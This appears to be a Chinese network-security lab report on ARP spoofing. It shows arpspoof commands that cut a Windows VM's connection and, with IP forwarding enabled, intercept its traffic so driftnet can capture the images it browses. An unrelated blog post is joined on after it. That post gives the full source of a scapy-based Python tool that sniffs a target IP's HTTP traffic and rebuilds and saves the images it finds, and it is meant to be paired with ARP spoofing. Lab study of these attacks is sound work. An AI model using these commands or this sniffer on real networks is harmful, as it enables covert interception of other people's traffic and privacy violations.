实验目的：

1.了解ARP欺骗的原理。

2.对ARP欺骗进行进一步的认识并提出防范措施。  

3. 掌握熟悉arpspoof和driftnet的使用方法。

 任务与要求：

1、利用arpspoof进行ARP断网攻击

2.利用arpspoof工具和driftnet工具进行ARP欺骗

 原理：

ARP（Address Resolution Protocol）是地址解析协议，是一种将IP地址转化成物理地址的协议。从IP地址到物理地址的映射有两种方式：表格方式和非表格方式。ARP具体说来就是将网络层（也就是相当于OSI的第三层）地址解析为数据链路层（也就是相当于OSI的第二层）的物理地址(注:此处物理地址并不一定指MAC地址)。

某机器A要向主机B发送报文，会查询本地的ARP缓存表，找到B的IP地址对应的MAC地址后，就会进行数据传输。如果未找到，则A广播一个ARP请求报文（携带主机A的IP地址Ia——物理地址Pa），请求IP地址为Ib的主机B回答物理地址Pb。网上所有主机包括B都收到ARP请求，但只有主机B识别自己的IP地址，于是向A主机发回一个ARP响应报文。其中就包含有B的MAC地址，A接收到B的应答后，就会更新本地的ARP缓存。接着使用这个MAC地址发送数据（由网卡附加MAC地址）。因此，本地高速缓存的这个ARP表是本地网络流通的基础，而且这个缓存是动态的。

 实验仪器设备（环境条件）：

满足安装vmware 环境Windows

Linux系统下的笔记本

在一个至少包含两台主机的交换式局域网内调试程序

 实验记载：

1、利用arpspoof进行ARP断网攻击

  A. 实验说明：

  *被攻击主机：windows虚拟机，win7系统,其ip地址为192.168.27.129，MAC地址为00-0c-29-14-05-30

*攻击主机：linux虚拟机，kali linux系统，其ip地址为192.168.27.131，MAC地址为00:0c:29:11:a9:25

*网关：ip地址为192.168.27.2,MAC地址为00-50-56-ea-95-48

*攻击工具：kali linux系统下的arpspoof工具

B. 实验步骤:

  Step 1. 在攻击主机打开终端，输入ip address，查看其网卡名称、ip地址、MAC地址。

 

图中，eth0为网卡名称，192.168.27.131为ip地址，192.168.27.131为kali机的MAC地址。

Step 2. 在虚拟机中，通过fping命令，查看当前局域网还存在那些主机，以确定要攻击的主机的ip地址

上图中，第一个ip地址192.168.27.2即为当前局域网的网关，而第二个ip地址就是要攻击的win7的ip地址：192.168.27.129,第三个是本机IP地址

Step 3. 在被攻击机中，通过控制面板中的网络和共享中心，查看其的ip地址，验证步骤二是否正确。

 

 从上图中可以看出，win7的ip地址的确为192.168.27.129，其MAC地址为00-0c-29-14-05-30，而局域网的网关地址也确实为192.168.27.2

Step 4. 在kali机中，ping一下要攻击的被攻击机，同时在被攻击机中ping一下kali机。确保两台主机可以通信。

 

从图中可以看出，没有包丢失，两台主机可以通信。可以进行ARP攻击。

Step 5. 在进行ARP攻击之前，可以先查看一下被攻击主机的ARP缓存表。以便于被攻击后的ARP缓存表进行对照。在被攻击机中，打开cmd，输入：arp -a

图中显示，被攻击机中的ARP缓存表记录了网关的MAC地址和攻击主机的MAC地址，可以看出它们的MAC地址是不一样的。

Step 6. 在攻击之前，检测一下被攻击主机的联网状态，用被攻击主机的cmd，ping一下百度。

图中显示，没有包丢失，说明此时被攻击主机可以上网。

Step 7. 在虚拟机中打开终端，利用arpspoof工具，对物理机发起ARP断网攻击。

输入arpspoof -i eth0 -t 192.168.27.129 192.168.27.2。其中，-i后面的参数是网卡名称，-t后面的参数是目的主机和网关，要截获目的主机发往网关的数据包。

（注意：此步骤需要kali机上具有arpspoof软件，若不具有则需要通过apt install dsniff进行安装）

（需要注意的是安装kali虚拟机时选择正确的版本，如：

 安装软件时出现以下情况时注意：

此时检查是否kali源是否未更新：

参考：

https://blog.csdn.net/gezongbo/article/details/119934697?spm=1001.2014.3001.5506

更改kali源后通过sudo apt update进行更新有以下情况出现：

 发现是因为签名过期，此时更改签名即可：

详细：

https://quantum6.blog.csdn.net/article/details/104975731?spm=1001.2014.3001.5506

 可以成功更新：

 安装dsniff、arpspoof:

 

 成功执行arpsproof工具：

从图中可以看出，此时kali机不断地向被攻击机发送ARP应答包，这个应答包将网关的ip地址192.168.27.2和kali机的MAC地址00:0c:29:11:a9:25绑定在一起，从而将被攻击机的ARP缓存表中的网关的MAC地址修改为虚拟机的MAC地址。

Step 8. 在物理机中再次使用cmd，向百度发送一个ping包，检查是否可以联网。同时打开网页，进行检查。

无法联通外网：

 

从上面两张图，可以看出，此时被攻击机已经断网了。

Step 9.检查被攻击主机的ARP缓存表，验证其是否被ARP攻击了。

从图中，可以看出，此时被攻击主机的ARP缓存表中的网关和攻击主机的MAC地址是一样的，均为攻击主机的MAC地址。可以认定，被攻击机遭遇了ARP攻击。

Step 10. 关闭虚拟机的终端，再次检查被攻击机的联网状态，ping一下百度。

 从图中可以看出，在一会的延迟之后，被攻击机又可以ping通百度了，又可以正常上网了。

2.利用arpspoof工具和driftnet工具进行ARP欺骗（截获图片）

Step1~~Step5同上述一样

Step 6. 在进行ARP欺骗前，得先打开攻击主机的IP转发功能，linux因为系统安全考虑，是不支持IP转发的，其配置文件写在/proc/sys/net/ipv4的ip_forward中。默认为0，接下来修改为1。

由于vi修改不被允许，可以通过命令行echo 1 > /proc/sys/net/ipv4/ip_forward实现。

 Step 7.在进行ARP欺骗前，先检查被攻击机的联网状态，Ping一下百度。

没有包丢失，可以ping通，被攻击机可以正常上网。

Step 8.在kali linux中利用arpspoof工具，对物理机发起AR欺骗攻击。

输入arpspoof -i eth0 -t 192.168.27.129 192.168.27.2。其中，-i后面的参数是网卡名称，-t后面的参数是目的主机和网关，要截获目的主机发往网关的数据包。

从图中可以看出，此时kali机不断地向被攻击机发送ARP应答包，这个应答包将网关的ip地址192.168.27.2和kali机的MAC地址00:0c:29:11:a9:25绑定在一起，从而将被攻击机的ARP缓存表中的网关的MAC地址修改为虚拟机的MAC地址。虚拟机截获了被攻击机和网关之间的数据包。

Step 9.检查物理机的联网状态，Ping一下百度。

没有包丢失，可以ping通，被攻击机依旧可以正常上网。

Step 10.检查被攻击机的ARP缓存表，检查其是否遭遇了ARP欺骗。

从图中，可以看出，此时被攻击主机的ARP缓存表中的网关和攻击主机的MAC地址是一样的，均为攻击主机的MAC地址。可以认定，被攻击机遭遇了ARP欺骗。

Step 11. 此时，被攻击机和网关通信的数据包都会流经虚拟机，那么可以在虚拟机中利用driftnet工具，可以捕获物理机正在浏览的图片。在虚拟机中打开driftnet。

注：也许此时在安装driftnet后仍然不能使用其抓捕图片：

 

此时可以修改相应kali源

详细见：

Ubuntu libpng12无法安装解决_l_ricardo的博客-CSDN博客_libpng12

同样需要sudo apt-get update

再次根据它的错误提示完整输入：

sudo apt-get --fix-broken install

(注:本人仅输入apt --fix-broken install在如下图输入yes后仍然报错)

 此时能成功使用：

 在被攻击机中浏览：

 Kali机中通过driftnet窗口可以看见：

 

感谢大佬们的分享：

干货，分享kali安装arpspoof，以及常见错误问题，结尾附上局域网arp断网攻击_CoCo_^的博客-CSDN博客_kali安装arpspoof

 E: 无法定位软件包_BoBo yeah的博客-CSDN博客_无法定位软件包

虚拟机kali arpspoof 攻击_Webo--DSG的博客-CSDN博客 

由于没有公钥，无法验证下列签名_柳鲲鹏的博客-CSDN博客_没有公钥无法验证下列签名 

Ubuntu libpng12无法安装解决_l_ricardo的博客-CSDN博客_libpng12 

前言

想必尝试过中间人攻击（MITM)的小伙伴，大概率是知道driftnet的。这是一款简单使用的图片捕获工具，可以很方便的从网络数据包中抓取图片，从而将监听对象所浏览的图片尽收眼底。
苦于driftnet对windows的支持不是特别友好，而且近日闲来没事，于是我决定用python写一个简单的图片嗅探工具。
哐哐哐~搞定之后，效果还是不错的：

简单设置过后，开始监听：

注意：本工具不具有arp欺骗的功能，因此需要结合arp欺骗相应工具使用（如EvilFoca）

一、数据包嗅探

数据的嗅探采用的是scapy库的sniff模块，一句话便能搞定：

# 嗅探函数
def dosniff(filter_rule,sniff_time,prn_f):
    sniff(filter=filter_rule,timeout=sniff_time,prn=prn_f) # 监听数据包

其中prn参数是一个回调函数，即每抓取到一个数据包之后将执行这个函数，而这也是捕获数据包中图片的关键，具体实现，客官您望下看~

二、图片捕获

这里需要明确的是，在图片的传输过程中，往往一个TCP包的长度是不够的，所以一张图片往往分为很多个包。因此，为了捕获其中的图片，我们必须对图片数据进行识别，并将对应的数据包合并（相同的ack值）。
具体思路如下：

1. 找到有上网数据的数据包

if p.haslayer(Raw): # 找出有上网数据的

2. 判断是否为含有图片的HTTP响应

if 'Content-Type: image' in str(load): # 如果为图片响应
	xxxxx # 提取HTTP协议中的相关信息（图片长度、图片后缀、IP地址、以及部分图片二进制数据）
else:
	xxxxx # 判断是否为图片数据的某一部分，如果是则将数据添加进去

3、把图片数据合并并生成图片

for i in img_list[ack][1:]: 
    img += i
if len(img) == length: # 如果图片数据已经完整
    imgname = '%d.%s'%(N,img_map[postfix])
    with open('./images/%s/%s'%(target,imgname),'wb') as f:
        f.write(img)   

完整的回调函数：

# 处理数据包
def handlepacket(p):
    global N,img_list,imgvalue_list,img_map
    if p.haslayer(Raw): # 找出有上网数据的
        load = p.load 
        ack = p.ack 
        try:
            ## 如果为图片相应,且带有HTTP头(即第一个图片TCP包)
            if 'Content-Type: image' in str(load): # 如果为图片响应
                postfix = re.findall('image/(.*?)\\\\r',str(load))[0] # 图片后缀
                length = int(re.findall('Content-Length: (.*?)\\\\r',str(load))[0]) # 图片数据长度
                ip_src = p['IP'].src # 源头IP
                ip_dst = p['IP'].dst # 目的IP
                img_list[ack] = [(postfix,length,ip_src,ip_dst)] # 0为图片信息(以下为图片二进制数据)
                img_load=load[load.find(b'\x0d\x0a\x0d\x0a')+4:] # 去除请求头部分，只要图片数据
                img_list[ack].append(img_load)
            ## 如果为某图片的后续数据包
            elif ack in list(img_list.keys()):
                img_load = load # 所有load均为图片数据
                img_list[ack].append(img_load)
                img = bytes()
                postfix = img_list[ack][0][0] # 图片后缀
                length = img_list[ack][0][1] # 图片长度
                ip_src = img_list[ack][0][2] # 源头IP 
                ip_dst = img_list[ack][0][3] # 目的IP
                for i in img_list[ack][1:]: 
                    img += i
                if len(img) == length: # 如果图片数据已经完整
                    imgname = '%d.%s'%(N,img_map[postfix])
                    with open('./images/%s/%s'%(target,imgname),'wb') as f:
                        f.write(img)
                        img = Image.open(BytesIO(img))
                        img = resize(200,200,img)
                        img_tk = ImageTk.PhotoImage(img)
                        imgvalue_list.append(img_tk)
                        Label(frame,image=imgvalue_list[-1],bg='black').grid(row=(N-1)//4,column=(N-1)%4,padx=23,pady=3)
                        canvas.create_window((ww/2,math.ceil(N/4)*105), window=frame)  #create_window 
                        canvas['scrollregion'] = (0,0,ww,math.ceil(N/4)*210)
                        canvas.yview_moveto(1)
                        print('%s【driftnet】: saving image data as "%s"'%(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),imgname))
                        N += 1
        except:
            pass

三、图片显示及主函数

为了将捕获的图片显示出来，我采用tkinter库，具体如下：

# 主函数
if __name__ == '__main__':
    printinfo()
    target = ''
    sniff_time = 24*60*60
    while True:
        choice = input('\n请选择:')
        if choice not in ['1','2','3','4','5']:
            print(colored('>>>选择错误，请重新输入!','red'))
            time.sleep(1)
            printinfo()
        else:
            if choice == '1':
                scan()
            if choice == '2':
                target = input('>>>监听目标(对方IP地址):')
                print('监听目标设置成功!')
                time.sleep(1)
                printinfo()
            if choice == '3':
                sniff_time = input('>>>监听时间(默认为86400秒):')
                sniff_time = int(sniff_time)
                print('监听时间设置成功!')
                time.sleep(1)
                printinfo()
            if choice == '4':
                if target == '':
                    print(colored('监听目标未设置!','red'))
                    time.sleep(1)
                    printinfo()
                else:
                    print('监听目标为"%s"  监听时间为"%s秒"'%(colored(target,'green'),colored(sniff_time,'green')))
                    op = input('是否开始(Y/N)?')
                    if not (op == 'Y' or op == 'y'):
                        printinfo()
                        continue
                    # 创建GUI
                    ## 初始化全局变量
                    N = 1 # 图片编号
                    img_list = {} # 图片字典,用于存储图片信息，以及对应数据包
                    imgvalue_list = [] # 图片数据，用于在画布上显示(防止由于局部变量等原因丢失变量)
                    ## 相关参数
                    bgcolor = 'black'
                    ## 创建root窗口(1000x630)
                    root = Tk()                   
                    root.title('driftnet') # 设置标题
                    root.iconbitmap('logo.ico')
                    root.config(bg=bgcolor)
                    sw = root.winfo_screenwidth()  # 屏幕宽度
                    sh = root.winfo_screenheight() # 屏幕高度
                    ww = 1000 # 窗口宽度
                    wh = 630 # 窗口高度
                    x = (sw-ww)/2 # 窗口横坐标
                    y = (sh-wh)/2 # 窗口纵坐标
                    root.geometry('%dx%d+%d+%d' %(ww,wh,x,y))
                    root.resizable(width=False, height=False) # 窗口大小无法更改
                    ## 创建画布canvas
                    canvas=Canvas(root,width=ww,height=wh) #创建canvas
                    canvas.grid()
                    ## 创建frame窗口
                    frame = tk.Frame(canvas)
                    frame.grid()
                    ## 滚动条
                    vbar=Scrollbar(root,orient=VERTICAL) #竖直滚动条
                    vbar.place(x=ww-20,y=0,width=20,height=wh)
                    vbar.configure(command=canvas.yview)
                    canvas.config(yscrollcommand=vbar.set) #设置 
                        
                    # 嗅探数据
                    if not os.path.exists('./images'):
                        os.mkdir('./images')
                    if not os.path.exists('./images/%s'%target):
                        os.mkdir('./images/%s'%target)
                    filter_rule = "tcp src port 80 and dst host {}".format(target) # 过滤规则
                    print('开始嗅探.....')
                    t = threading.Thread(target=dosniff,args=(filter_rule,sniff_time,handlepacket,))
                    t.start()
                    
                    # 进入消息循环
                    root.mainloop()
                    
                    # 关闭嗅探线程
                    stop_thread(t)
                    #input() # 处理stop_thread多余的输出流
                    printinfo()
            if choice == '5':
                print('Good bye!')
                exit(0)

这里遇到的坑主要是滚动条自动下滑的问题（即当我们不断捕获到图片的时候，如果让界面将所有图片显示出来，并且滚动条始终保持在最小面）。

写在最后

代码些许有些混乱，主要是想跟小伙伴们分享下一些思路，也希望可以有所帮助或启发：

• 如何从数据包中捕获图片数据
• Tkinter如何实现滚动条自动下滑

最后，感谢各位大大的耐心阅读~
慢着，大侠请留步… 动起可爱的双手，来个赞再走呗 (๑◕ܫ￩๑)